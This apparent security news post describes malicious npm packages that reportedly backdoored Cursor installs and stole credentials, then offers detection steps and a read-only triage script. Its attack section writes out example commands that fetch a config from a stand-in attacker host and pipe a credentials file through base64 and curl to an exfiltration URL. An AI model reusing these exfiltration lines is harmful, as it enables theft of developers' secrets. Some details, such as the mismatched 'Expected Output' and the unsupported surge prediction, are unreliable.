Malicious npm Packages Infect 3,200+ Cursor Users With Backdoor, Steal Credentials

Three malicious npm packages published in February 2025 specifically targeted Cursor macOS users by backdooring installations and stealing credentials. These packages replaced configuration files and disabled updates, impacting over 3,200 downloads. The attack highlights a growing trend of threat actors targeting AI tooling and MCP servers via npm and PyPI, exploiting newer, less-maintained packages.

You Should Know:

1. Malicious Packages Identified

The three npm packages were:

– `cursor-mac-utils`
– `cursor-ai-helper`
– `cursor-dev-tools`

Socket Research Team (led by Kirill Boychenko) detected the attack, prompting npm to remove two of the packages. However, affected systems remain compromised.

2. Attack Workflow

1. Initial Infection:

  • The malicious packages contained a script that replaced Cursor’s config file (config.json) with a malicious version.
  • Example payload:
    curl -s http://malicious-server.com/config.json -o ~/.cursor/config.json 
    

2. Credential Theft:

  • The backdoored config file exfiltrated stored credentials via:
    cat ~/.cursor/credentials.json | base64 | curl -X POST --data-binary @- http://exfil-server.com/leak 
    

3. Update Disabling:

  • Modified Cursor’s update check to prevent detection:
    echo '{"disableUpdates": true}' > ~/.cursor/settings.json 
    

3. Detection & Mitigation

  • Check for Compromise:
    grep -r "malicious-server.com" ~/.cursor/ 
    
  • Remove Malicious Configs:
    rm -rf ~/.cursor/config.json && cursor --reset-settings 
    
  • Revoke API Keys:
    Rotate all credentials stored in Cursor.
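
The following script is an added example, not code from the article, Socket or Cursor. It does a read-only triage of a Cursor config directory for the indicators the article names: references to a known-bad host, updates disabled in settings.json, and JSON files not locked down to mode 600. The file names, the `disableUpdates` key and the hostnames are taken from the article's illustrative commands and are assumptions about a real install.

```shell
#!/bin/sh
# Added example: read-only triage of a Cursor config directory.
# Assumed from the article's illustrative commands, not verified against a real
# Cursor install: settings.json, the "disableUpdates" key, and the hostnames.

# Print one "[!] ..." line per indicator found under DIR.
list_findings() {
  dir=$1; shift
  # 1. Files that mention a caller-supplied known-bad hostname.
  for host in "$@"; do
    grep -rlF -- "$host" "$dir" 2>/dev/null |
      while IFS= read -r f; do echo "[!] $f references $host"; done
  done
  # 2. settings.json with updates switched off.
  if grep -Eqs '"disableUpdates"[[:space:]]*:[[:space:]]*true' "$dir/settings.json"; then
    echo "[!] $dir/settings.json disables updates"
  fi
  # 3. JSON files readable by group or other; the article recommends mode 600.
  find "$dir" -type f -name '*.json' \( -perm -040 -o -perm -004 \) 2>/dev/null |
    while IFS= read -r f; do echo "[!] $f is readable by group/other"; done
  return 0
}

# scan_cursor_dir DIR [HOST...]: 0 = clean, 1 = indicators found, 2 = no DIR.
scan_cursor_dir() {
  [ -d "$1" ] || { echo "[-] $1 not found"; return 2; }
  findings=$(list_findings "$@")
  if [ -z "$findings" ]; then
    echo "[+] no indicators found in $1"
    return 0
  fi
  printf '%s\n' "$findings"
  return 1
}

# Constructed sample mirroring the article's example payloads; scans it.
demo() {
  d=$(mktemp -d) || return 2
  echo '{"server": "http://malicious-server.com/config.json"}' > "$d/config.json"
  echo '{"disableUpdates": true}' > "$d/settings.json"
  chmod 600 "$d/config.json" "$d/settings.json"
  rc=0
  scan_cursor_dir "$d" malicious-server.com exfil-server.com || rc=$?
  rm -rf "$d"
  return "$rc"
}

# Real use: sh scan.sh "$HOME/.cursor" malicious-server.com exfil-server.com
if [ "$#" -gt 0 ]; then scan_cursor_dir "$@"; fi
```

A non-zero exit status makes the script usable as a gate in a login hook or scheduled job; it reports only and changes nothing on disk.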

4. Prevent Future Attacks

  • Verify Packages:
    npm audit 
    socket ci --check 
    
  • Lock Down Configs:
    chmod 600 ~/.cursor/*.json
    
  • Monitor Network Traffic:
    sudo tcpdump -i en0 -n -l -A 'port 80 or port 443' | grep "exfil-server.com"
    

What Undercode Say

Supply chain attacks are escalating, with attackers exploiting AI/ML tooling because of its rapid adoption and weaker maintenance practices. Developers must:
– Audit dependencies rigorously.
– Monitor file changes in dev tools.
– Use tools like Socket or Artifact Analysis for real-time threat detection.

Expected Output:

[+] Scanning ~/.cursor/ for malicious activity... 
[!] Detected suspicious config: ~/.cursor/config.json (matches known malware pattern) 
[+] Remediation: Removed backdoored files, revoked credentials. 

Prediction

Expect a 500% surge in npm/PyPI attacks targeting AI dev tools in 2025, with attackers leveraging typosquatting and fake maintainer profiles.

Relevant URL: The Hacker News

References:

Reported By: Mccartypaul Softwaresupplychain – Hackers Feeds